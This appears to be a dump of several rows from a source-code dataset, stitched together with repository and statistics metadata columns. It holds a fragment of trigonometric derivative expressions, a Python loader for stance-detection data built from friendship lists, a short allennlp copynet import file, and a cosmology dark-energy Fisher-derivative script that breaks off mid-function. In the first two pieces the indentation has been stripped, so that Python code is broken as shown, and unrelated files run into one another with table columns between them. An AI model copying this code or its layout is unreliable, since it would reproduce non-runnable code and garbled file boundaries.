6 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.sin(3 * pi * m * x) +
6 * math.sin(3 * pi * m * z) * pi * m * math.cos(pi * m * x) * math.cos(3 * pi * m * y) -
2 * pi * m * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
6 * pi * m * math.cos(3 * pi * m * y) * math.sin(pi * m * z) * math.cos(3 * pi * m * x) +
6 * math.sin(3 * pi * m * z) * pi * m * math.sin(pi * m * x) * math.sin(3 * pi * m * y))
    # t4_z: first derivative with respect to z
cg1 = (-6 * pi * m * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
2 * pi * m * math.cos(3 * pi * m * y) * math.sin(pi * m * z) * math.cos(3 * pi * m * x) -
6 * math.sin(3 * pi * m * z) * pi * m * math.cos(pi * m * x) * math.cos(3 * pi * m * y) +
6 * pi * m * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
2 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi * m * math.sin(3 * pi * m * x) +
6 * math.cos(3 * pi * m * z) * math.cos(pi * m * x) * pi * m * math.sin(3 * pi * m * y) +
6 * math.sin(3 * pi * m * x) * pi * m * math.sin(pi * m * y) * math.sin(3 * pi * m * z) -
2 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi * m * math.cos(3 * pi * m * x) -
6 * math.cos(3 * pi * m * z) * pi * m * math.sin(pi * m * x) * math.cos(3 * pi * m * y))
    # t4_xx: second derivative with respect to x
cg2 = (-18 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
18 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) -
2 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.cos(3 * pi * m * y) -
18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
18 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) -
2 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y) +
18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
18 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
2 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y))
    # t4_xy: mixed second derivative with respect to x and y
cg3 = (6 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
18 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) +
6 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.sin(3 * pi * m * y) -
6 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.sin(pi * m * y) * math.sin(3 * pi * m * z) +
18 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) -
6 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y) -
6 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) +
18 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * y) * math.sin(pi * m * z) * math.sin(3 * pi * m * x) +
6 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y))
#t4_yy
cg4 = (-2 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
18 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) -
18 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.cos(3 * pi * m * y) -
2 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
18 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) -
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y) +
2 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
18 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y))
#t4_yz
cg5 = (6 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.sin(pi * m * y) * math.sin(3 * pi * m * z) +
6 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y) -
6 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) -
6 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * y) * math.sin(pi * m * z) * math.sin(3 * pi * m * x) +
18 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.cos(3 * pi * m * y) +
6 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
6 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
18 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.sin(3 * pi * m * y))
#t4_zz
cg6 = (-18 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
2 * math.cos(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) -
18 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.cos(3 * pi * m * y) -
18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) -
2 * math.sin(3 * pi * m * y) * math.cos(pi * m * z) * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) -
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.cos(pi * m * x) * math.sin(3 * pi * m * y) +
18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.sin(pi * m * y) * math.cos(3 * pi * m * z) +
2 * math.sin(3 * pi * m * y) * math.sin(pi * m * z) * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) +
18 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y))
#t4_xz
cg7 = (18 * pi ** 2 * m ** 2 * math.sin(3 * pi * m * x) * math.cos(pi * m * y) * math.sin(3 * pi * m * z) +
6 * math.cos(3 * pi * m * y) * pi ** 2 * m ** 2 * math.sin(pi * m * z) * math.sin(3 * pi * m * x) +
6 * math.sin(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.cos(3 * pi * m * y) +
18 * pi ** 2 * m ** 2 * math.cos(3 * pi * m * x) * math.cos(pi * m * y) * math.cos(3 * pi * m * z) -
6 * math.sin(3 * pi * m * y) * pi ** 2 * m ** 2 * math.sin(pi * m * z) * math.cos(3 * pi * m * x) -
6 * math.cos(3 * pi * m * z) * pi ** 2 * m ** 2 * math.sin(pi * m * x) * math.sin(3 * pi * m * y))
return np.array([cg,cg0,cg1,cg2,cg3,cg4,cg5,cg6,cg7]) | 81.898148 | 113 | 0.384398 | 1,730 | 8,845 | 1.960116 | 0.027746 | 0.230905 | 0.184017 | 0.230021 | 0.939546 | 0.939546 | 0.939251 | 0.938661 | 0.938366 | 0.938366 | 0 | 0.071063 | 0.381119 | 8,845 | 108 | 114 | 81.898148 | 0.548411 | 0.016959 | 0 | 0.228916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012048 | false | 0 | 0.024096 | 0 | 0.048193 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
612cd9c1dd720b25127f527f65fbd77ee6415316 | 13,648 | py | Python | Dataset_New.py | zijie2333/tensorflow_neural_collaborative_filtering | 736b3f2f798457a1a2ef53e00d2549ddb5677f89 | [
"Apache-2.0"
] | null | null | null | Dataset_New.py | zijie2333/tensorflow_neural_collaborative_filtering | 736b3f2f798457a1a2ef53e00d2549ddb5677f89 | [
"Apache-2.0"
] | null | null | null | Dataset_New.py | zijie2333/tensorflow_neural_collaborative_filtering | 736b3f2f798457a1a2ef53e00d2549ddb5677f89 | [
"Apache-2.0"
] | 1 | 2018-12-27T03:34:22.000Z | 2018-12-27T03:34:22.000Z | '''
Created on Aug 8, 2016
Processing datasets.
@author: Zijie Huang
'''
import scipy.sparse as sp
import numpy as np
#### For grouped friendship: friends are given as indices.
class Dataset_New(object):
def __init__(self, args):
'''
Constructor
'''
self.num_items = args.num_items
self.num_classes = args.num_classes
self.num_users = args.num_users
Train_data = args.path + args.dataset + "/Train_Athesim_5_Renumbered_000_own.txt"
Test_data = args.path + args.dataset+ "/Test_Athesim_5_Renumbered_000_own.txt"
self.largest_friends_number = self.Find_largest_friends_number(Train_data,Test_data)
self.train_users, self.train_items, self.train_labels, self.train_isintargets,self.train_weights = self.load_train_file_as_numpy(
Train_data,self.largest_friends_number)
self.test_users, self.test_labels, self.test_isintargets,self.test_weights= self.load_test_file_as_numpy(
Test_data,self.largest_friends_number)
self.t_train_users, self.t_train_labels, self.t_train_isintargets,self.t_train_weights = self.load_test_file_as_numpy(
Train_data,self.largest_friends_number)
def Find_largest_friends_number(self,Train_data,Test_data):
largest_friends_number=0
for filename in [Train_data,Test_data]:
with open(filename,'r') as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends=arr[3].split(":")
if len(friends[2:])==0:
continue ##no friends
largest_friends_number=max(largest_friends_number,len(friends[2:]))
print("Largest friends number is %d"%largest_friends_number)
return largest_friends_number
def convert_stances(self, stance):
#convert stance into np.array of shape [1]
stance_ID=np.zeros(1,dtype="int32")
if stance == 'NONE':
stance_ID[0] = 0
elif stance == 'AGAINST':
stance_ID[0]= 1
elif stance == 'FAVOR':
stance_ID[0] = 2
return stance_ID
def load_train_file_as_numpy(self, filename, largest_friends_number): #original_num*3
labels = []
users = []
items = []
user_weights=[]
isintargets = []
total_users=set()
total_tweet=list()
favor,against,none=0,0,0
with open(filename, "r") as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends=arr[3].split(":")
if len(friends[2:])==0:
continue ##no friends
user_friends = []
user = arr[2]
if user in total_users: #if user in total_users: # use only the first stance of a user.
continue
total_users.add(user)
total_tweet.append(user)
##padding friendship.
for friend in friends[2:]:
friend_ID = int(friend)
user_friends.append(int(friend_ID-1))
if len(user_friends) != largest_friends_number:
padding = np.zeros(largest_friends_number - len(user_friends), dtype='int32').tolist()
user_friends = np.asarray(user_friends + padding)
else:
user_friends=np.asarray(user_friends)
user_weight_0 = np.ones(len(friends[2:]))
user_weight_1 = np.zeros(largest_friends_number-len(friends[2:]))
user_weight = np.concatenate((user_weight_0,user_weight_1))
##create three stances
isintarget=arr[5]
stance=self.convert_stances(arr[4])
#Calculate f,a,n portion.
if stance[0] == 0:
none+=1
elif stance[0] == 1:
against+=1
elif stance[0] == 2:
favor+=1
for x in range(0, 3):  # one (item, label) pair per stance class
if x == stance[0]:
y=1
else:
y=0
item_now=np.zeros(1,dtype='int32')
item_now[0]=x
label_now=np.zeros(1,dtype='int32')
label_now[0]=y
users.append(user_friends)
user_weights.append(user_weight)
items.append(item_now)
labels.append(label_now)
isintargets.append(isintarget)
####reshape
items=np.reshape(np.array(items),(-1,1))
labels = np.reshape(np.array(labels), (-1, 1))
total=favor+against+none
print("Number of total users is %d" % len(total_users))
print("Number of total tweets is %d" % len(total_tweet))
print("favor=%f against=%f none=%f" % (favor/float(total), against/float(total), none/float(total)))
return np.array(users), items, labels, isintargets, np.asarray(user_weights)
def load_test_file_as_numpy(self, filename,largest_friends_number):
labels = []
users = []
items = []
user_weights= []
isintargets = []
total_users = set()
total_tweet = list()
favor, against, none = 0, 0, 0
with open(filename, "r") as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends = arr[3].split(":")
if len(friends[2:]) == 0:
continue ##no friends
user = arr[2]
#if user in total_users: ## already has a stance
if user in total_users:
continue
total_users.add(user)
total_tweet.append(user)
user_friends = []
for friend in friends[2:]:
friend_ID = int(friend)
user_friends.append(int(friend_ID - 1))
if len(user_friends) != largest_friends_number:
padding = np.zeros(largest_friends_number - len(user_friends), dtype='int32').tolist()
user_friends = np.asarray(user_friends + padding)
else:
user_friends = np.asarray(user_friends)
user_weight_0 = np.ones(len(friends[2:]))
user_weight_1 = np.zeros(largest_friends_number-len(friends[2:]))
user_weight = np.concatenate((user_weight_0,user_weight_1))
isintarget = arr[5]
stance = self.convert_stances(arr[4]) #0,1,2
#Calculate f,a,n portion.
if stance[0] == 0:
none+=1
elif stance[0] == 1:
against+=1
elif stance[0] == 2:
favor+=1
users.append(user_friends)
user_weights.append(user_weight)
labels.append(stance)
isintargets.append(isintarget)
####reshape
labels = np.reshape(np.array(labels), (-1, 1))
total = favor + against + none
print("Number of total users is %d" % len(total_users))
print("Number of total tweets is %d" % len(total_tweet))
print("favor=%f against=%f none=%f" % (favor / float(total), against / float(total), none / float(total)))
return np.array(users),labels, isintargets,np.asarray(user_weights)
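# Standalone sketch (illustrative, not part of the original dataset code): the
# loaders above turn a variable-length friend list into a fixed-size index
# vector plus a 0/1 weight mask, so padded slots can be masked out downstream.
# A pure-Python version of that padding scheme (hypothetical helper name):
def _pad_with_mask(friend_ids, width):
    """Pad friend_ids with zeros to `width`; the mask marks the real entries."""
    padded = list(friend_ids) + [0] * (width - len(friend_ids))
    mask = [1.0] * len(friend_ids) + [0.0] * (width - len(friend_ids))
    return padded, mask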
###n-hot vector
class Dataset(object):
def __init__(self, args):
'''
Constructor
'''
self.num_items = args.num_items
self.num_classes = args.num_classes
self.num_users = args.num_users
Train_data = args.path + args.dataset + "/Train_Athesim_5_Renumbered_000_own.txt"
Test_data = args.path + args.dataset+ "/Test_Athesim_5_Renumbered_000_own.txt"
self.train_users, self.train_items, self.train_labels, self.train_isintargets = self.load_train_file_as_numpy(
Train_data)
self.test_users, self.test_labels, self.test_isintargets= self.load_test_file_as_numpy(
Test_data)
self.t_train_users, self.t_train_labels, self.t_train_isintargets= self.load_test_file_as_numpy(
Train_data)
def convert_stances(self, stance):
#convert stance into np.array of shape [1]
stance_ID=np.zeros(1,dtype="int32")
if stance == 'NONE':
stance_ID[0] = 0
elif stance == 'AGAINST':
stance_ID[0]= 1
elif stance == 'FAVOR':
stance_ID[0] = 2
return stance_ID
def load_train_file_as_numpy(self, filename): #original_num*3
labels = []
users = []
items = []
isintargets = []
total_users=set()
total_tweet=list()
favor,against,none=0,0,0
with open(filename, "r") as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends=arr[3].split(":")
if len(friends[2:])== 0:
continue ##no friends
user_friends = []
user = arr[2]
if user in total_users: #if user in total_users: # use only the first stance of a user.
continue
total_users.add(user)
total_tweet.append(user)
##padding friendship.
user_friends = np.zeros(self.num_users)
if len(friends[2:])!=0:
for friend in friends[2:]:
friend_ID = int(friend)
user_friends[int(friend_ID-1)]=1
##create three stances
isintarget=arr[5]
stance=self.convert_stances(arr[4])
#Calculate f,a,n portion.
if stance[0] == 0:
none+=1
elif stance[0] == 1:
against+=1
elif stance[0] == 2:
favor+=1
for x in range(0, 3):  # one (item, label) pair per stance class
if x == stance[0]:
y=1
else:
y=0
item_now=np.zeros(1,dtype='int32')
item_now[0]=x
label_now=np.zeros(1,dtype='int32')
label_now[0]=y
users.append(user_friends)
items.append(item_now)
labels.append(label_now)
isintargets.append(isintarget)
####reshape
items=np.reshape(np.array(items),(-1,1))
labels = np.reshape(np.array(labels), (-1, 1))
total=favor+against+none
print("Number of total users is %d" % len(total_users))
print("Number of total tweets is %d" % len(total_tweet))
print("favor=%f against=%f none=%f" % (favor/float(total), against/float(total), none/float(total)))
return np.asarray(users), items, labels, isintargets
def load_test_file_as_numpy(self, filename):
labels = []
users = []
isintargets = []
total_users = set()
total_tweet = list()
num_of_no_friend=0
favor, against, none = 0, 0, 0
with open(filename, "r") as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends = arr[3].split(":")
if friends[1] == '0':  # fields from split(":") are strings; `== 0` never matched
continue ##no user
if len(friends[2:]) == 0:
num_of_no_friend += 1  # count users skipped for having no friends
continue
user = arr[2]
#if user in total_users: ## already has a stance
if user in total_users:
continue
total_users.add(user)
total_tweet.append(user)
##padding friendship.
user_friends = np.zeros(self.num_users)
if len(friends[2:]) != 0:
for friend in friends[2:]:
friend_ID = int(friend)
user_friends[int(friend_ID - 1)] = 1
isintarget = arr[5]
stance = self.convert_stances(arr[4]) #0,1,2
#Calculate f,a,n portion.
if stance[0] == 0:
none+=1
elif stance[0] == 1:
against+=1
elif stance[0] == 2:
favor+=1
users.append(user_friends)
labels.append(stance)
isintargets.append(isintarget)
####reshape
labels = np.reshape(np.array(labels), (-1, 1))
total = favor + against + none
print("Number of total users is %d" % len(total_users))
print("Number of total tweets is %d" % len(total_tweet))
print("Number of users with no friends is %d" % num_of_no_friend)
print("favor=%f against=%f none=%f" % (favor / float(total), against / float(total), none / float(total)))
return np.asarray(users),labels, isintargets
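# Standalone sketch (illustrative): the Dataset class above encodes each friend
# list as an "n-hot" 0/1 vector indexed by friend ID, with the 1-based IDs
# shifted down by one. A pure-Python version of that encoding (hypothetical
# helper name):
def _n_hot(friend_ids, num_users):
    """Return a length-num_users 0/1 list with ones at positions friend_id - 1."""
    vec = [0] * num_users
    for friend_id in friend_ids:
        vec[friend_id - 1] = 1
    return vec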
| 35.821522 | 137 | 0.512456 | 1,587 | 13,648 | 4.218652 | 0.085066 | 0.041075 | 0.059746 | 0.015534 | 0.91531 | 0.911725 | 0.883794 | 0.876027 | 0.853921 | 0.817177 | 0 | 0.024027 | 0.380935 | 13,648 | 380 | 138 | 35.915789 | 0.768375 | 0.055026 | 0 | 0.886926 | 0 | 0 | 0.05063 | 0.012051 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031802 | false | 0 | 0.007067 | 0 | 0.070671 | 0.04947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fcb0dcb9a821a4c9ff1eb49053c9b49979af4792 | 169 | py | Python | allennlp_models/seq2seq/copynet/__init__.py | jens321/allennlp-models | cee3a7507cf8d15cd8520808bd9c6381369e868e | [
"Apache-2.0"
] | 1 | 2020-05-19T05:14:50.000Z | 2020-05-19T05:14:50.000Z | allennlp_models/seq2seq/copynet/__init__.py | jens321/allennlp-models | cee3a7507cf8d15cd8520808bd9c6381369e868e | [
"Apache-2.0"
] | null | null | null | allennlp_models/seq2seq/copynet/__init__.py | jens321/allennlp-models | cee3a7507cf8d15cd8520808bd9c6381369e868e | [
"Apache-2.0"
] | null | null | null | from allennlp_models.seq2seq.copynet.copynet_seq2seq_model import CopyNetSeq2Seq
from allennlp_models.seq2seq.copynet.copynet_seq2seq_reader import CopyNetDatasetReader
| 56.333333 | 87 | 0.91716 | 20 | 169 | 7.45 | 0.5 | 0.161074 | 0.241611 | 0.33557 | 0.61745 | 0.61745 | 0.61745 | 0 | 0 | 0 | 0 | 0.031056 | 0.047337 | 169 | 2 | 88 | 84.5 | 0.89441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fcbfa2222d4ef665c94d70e263a049ccb1c082b1 | 8,233 | py | Python | test_eosfn.py | sjforeman/RadioFisher | fe25f969de9a700c5697168ba9e0d2645c55ed81 | [
"AFL-3.0"
] | 3 | 2020-12-05T11:28:47.000Z | 2021-07-09T02:42:21.000Z | test_eosfn.py | sjforeman/RadioFisher | fe25f969de9a700c5697168ba9e0d2645c55ed81 | [
"AFL-3.0"
] | null | null | null | test_eosfn.py | sjforeman/RadioFisher | fe25f969de9a700c5697168ba9e0d2645c55ed81 | [
"AFL-3.0"
] | 2 | 2021-07-09T02:42:23.000Z | 2021-11-30T06:37:47.000Z | #!/usr/bin/python
"""
Test the function that maps from EOS
"""
import numpy as np
import pylab as P
import scipy.integrate
import scipy.interpolate
import radiofisher as rf
from radiofisher.experiments import cosmo
C = 3e5
ax1 = P.subplot(111)
def old_eos_fisher_matrix_derivs(cosmo, cosmo_fns):
"""
Pre-calculate derivatives required to transform (aperp, apar) into dark
energy parameters (Omega_k, Omega_DE, w0, wa, h, gamma).
Returns interpolation functions for d(f,a_perp,par)/d(DE params) as fn. of a.
"""
w0 = cosmo['w0']; wa = cosmo['wa']
om = cosmo['omega_M_0']; ol = cosmo['omega_lambda_0']
ok = 1. - om - ol
# Omega_DE(a) and E(a) functions
omegaDE = lambda a: ol * np.exp(3.*wa*(a - 1.)) / a**(3.*(1. + w0 + wa))
E = lambda a: np.sqrt( om * a**(-3.) + ok * a**(-2.) + omegaDE(a) )
# Derivatives of E(z) w.r.t. parameters
#dE_omegaM = lambda a: 0.5 * a**(-3.) / E(a)
if np.abs(ok) < 1e-7: # Effectively zero
dE_omegak = lambda a: 0.5 * a**(-2.) / E(a)
else:
dE_omegak = lambda a: 0.5 * a**(-2.) / E(a) * (1. - 1./a)
dE_omegaM = lambda a: 0.5 * a**(-3.) / E(a)
dE_omegaDE = lambda a: 0.5 / E(a) * (1. - 1./a**3.)
dE_w0 = lambda a: -1.5 * omegaDE(a) * np.log(a) / E(a)
dE_wa = lambda a: -1.5 * omegaDE(a) * (np.log(a) + 1. - a) / E(a)
# Bundle functions into list (for performing repetitive operations with them)
fns = [dE_omegak, dE_omegaDE, dE_w0, dE_wa]
# Set sampling of scale factor, and precompute some values
HH, rr, DD, ff = cosmo_fns
aa = np.linspace(1., 1e-4, 500)
zz = 1./aa - 1.
EE = E(aa); fz = ff(aa)
gamma = cosmo['gamma']; H0 = 100. * cosmo['h']; h = cosmo['h']
# Derivatives of apar w.r.t. parameters
derivs_apar = [f(aa)/EE for f in fns]
# Derivatives of f(z) w.r.t. parameters
f_fac = -gamma * fz / EE
df_domegak = f_fac * (EE/om + dE_omegak(aa))
df_domegaDE = f_fac * (EE/om + dE_omegaDE(aa))
df_w0 = f_fac * dE_w0(aa)
df_wa = f_fac * dE_wa(aa)
df_dh = np.zeros(aa.shape)
df_dgamma = fz * np.log(rf.omegaM_z(zz, cosmo))
derivs_f = [df_domegak, df_domegaDE, df_w0, df_wa, df_dh, df_dgamma]
# Calculate comoving distance (including curvature)
r_c = scipy.integrate.cumtrapz(1./(aa**2. * EE)) # FIXME!
r_c = np.concatenate(([0.], r_c))
if ok > 0.:
r = C/(H0*np.sqrt(ok)) * np.sinh(r_c * np.sqrt(ok))
elif ok < 0.:
r = C/(H0*np.sqrt(-ok)) * np.sin(r_c * np.sqrt(-ok))
else:
r = C/H0 * r_c
# Perform integrals needed to calculate derivs. of aperp
# FIXME: No factor of 2!
print("*" * 190)
derivs_aperp = [(C/H0)/r[1:] * scipy.integrate.cumtrapz( f(aa)/(aa * EE)**2.)
for f in fns] # FIXME
# Add additional term to curvature integral (idx 1)
# N.B. I think Pedro's result is wrong (for fiducial Omega_k=0 at least),
# so I'm commenting it out
#derivs_aperp[1] -= (H0 * r[1:] / C)**2. / 6.
# Add initial values (to deal with 1/(r=0) at origin)
inivals = [0.5, 0.0, 0., 0.] # FIXME: Are these OK?
derivs_aperp = [ np.concatenate(([inivals[i]], derivs_aperp[i]))
for i in range(len(derivs_aperp)) ]
# Add (h, gamma) derivs to aperp,apar
derivs_aperp += [np.ones(aa.shape)/h, np.zeros(aa.shape)]
derivs_apar += [np.ones(aa.shape)/h, np.zeros(aa.shape)]
# Construct interpolation functions
interp_f = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_f]
interp_apar = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_apar]
interp_aperp = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_aperp]
return [interp_f, interp_aperp, interp_apar]
def eos_fisher_matrix_derivs(cosmo, cosmo_fns):
"""
Pre-calculate derivatives required to transform (aperp, apar) into dark
energy parameters (Omega_k, Omega_DE, w0, wa, h, gamma).
Returns interpolation functions for d(f,a_perp,par)/d(DE params) as fn. of a.
"""
w0 = cosmo['w0']; wa = cosmo['wa']
om = cosmo['omega_M_0']; ol = cosmo['omega_lambda_0']
ok = 1. - om - ol
# Omega_DE(a) and E(a) functions
omegaDE = lambda a: ol * np.exp(3.*wa*(a - 1.)) / a**(3.*(1. + w0 + wa))
E = lambda a: np.sqrt( om * a**(-3.) + ok * a**(-2.) + omegaDE(a) )
# Derivatives of E(z) w.r.t. parameters
#dE_omegaM = lambda a: 0.5 * a**(-3.) / E(a)
if np.abs(ok) < 1e-7: # Effectively zero
dE_omegak = lambda a: 0.5 * a**(-2.) / E(a)
else:
dE_omegak = lambda a: 0.5 * a**(-2.) / E(a) * (1. - 1./a)
dE_omegaM = lambda a: 0.5 * a**(-3.) / E(a)
dE_omegaDE = lambda a: 0.5 / E(a) * (1. - 1./a**3.)
dE_w0 = lambda a: -1.5 * omegaDE(a) * np.log(a) / E(a)
dE_wa = lambda a: -1.5 * omegaDE(a) * (np.log(a) + 1. - a) / E(a)
# Bundle functions into list (for performing repetitive operations with them)
fns = [dE_omegak, dE_omegaDE, dE_w0, dE_wa]
# Set sampling of scale factor, and precompute some values
HH, rr, DD, ff = cosmo_fns
aa = np.linspace(1., 1e-4, 500)
zz = 1./aa - 1.
EE = E(aa); fz = ff(aa)
gamma = cosmo['gamma']; H0 = 100. * cosmo['h']; h = cosmo['h']
# Derivatives of apar w.r.t. parameters
derivs_apar = [f(aa)/EE for f in fns]
# Derivatives of f(z) w.r.t. parameters
f_fac = -gamma * fz / EE
df_domegak = f_fac * (EE/om + dE_omegak(aa))
df_domegaDE = f_fac * (EE/om + dE_omegaDE(aa))
df_w0 = f_fac * dE_w0(aa)
df_wa = f_fac * dE_wa(aa)
df_dh = np.zeros(aa.shape)
df_dgamma = fz * np.log(rf.omegaM_z(zz, cosmo)) # FIXME: rf.omegaM_z
derivs_f = [df_domegak, df_domegaDE, df_w0, df_wa, df_dh, df_dgamma]
# Calculate comoving distance (including curvature)
r_c = scipy.integrate.cumtrapz(1./(aa**2. * EE), aa) # FIXME!
r_c = np.concatenate(([0.], r_c))
if ok > 0.:
r = C/(H0*np.sqrt(ok)) * np.sinh(r_c * np.sqrt(ok))
elif ok < 0.:
r = C/(H0*np.sqrt(-ok)) * np.sin(r_c * np.sqrt(-ok))
else:
r = C/H0 * r_c
# Perform integrals needed to calculate derivs. of aperp
print("*" * 190)
derivs_aperp = [(C/H0)/r[1:] * scipy.integrate.cumtrapz( f(aa)/(aa * EE)**2., aa)
for f in fns] # FIXME
# Add additional term to curvature integral (idx 1)
# N.B. I think Pedro's result is wrong (for fiducial Omega_k=0 at least),
# so I'm commenting it out
#derivs_aperp[1] -= (H0 * r[1:] / C)**2. / 6.
# Add initial values (to deal with 1/(r=0) at origin)
inivals = [0.5, 0.0, 0., 0.] # FIXME: Are these OK?
derivs_aperp = [ np.concatenate(([inivals[i]], derivs_aperp[i]))
for i in range(len(derivs_aperp)) ]
# Add (h, gamma) derivs to aperp,apar
derivs_aperp += [np.ones(aa.shape)/h, np.zeros(aa.shape)]
derivs_apar += [np.ones(aa.shape)/h, np.zeros(aa.shape)]
# Construct interpolation functions
interp_f = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_f]
interp_apar = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_apar]
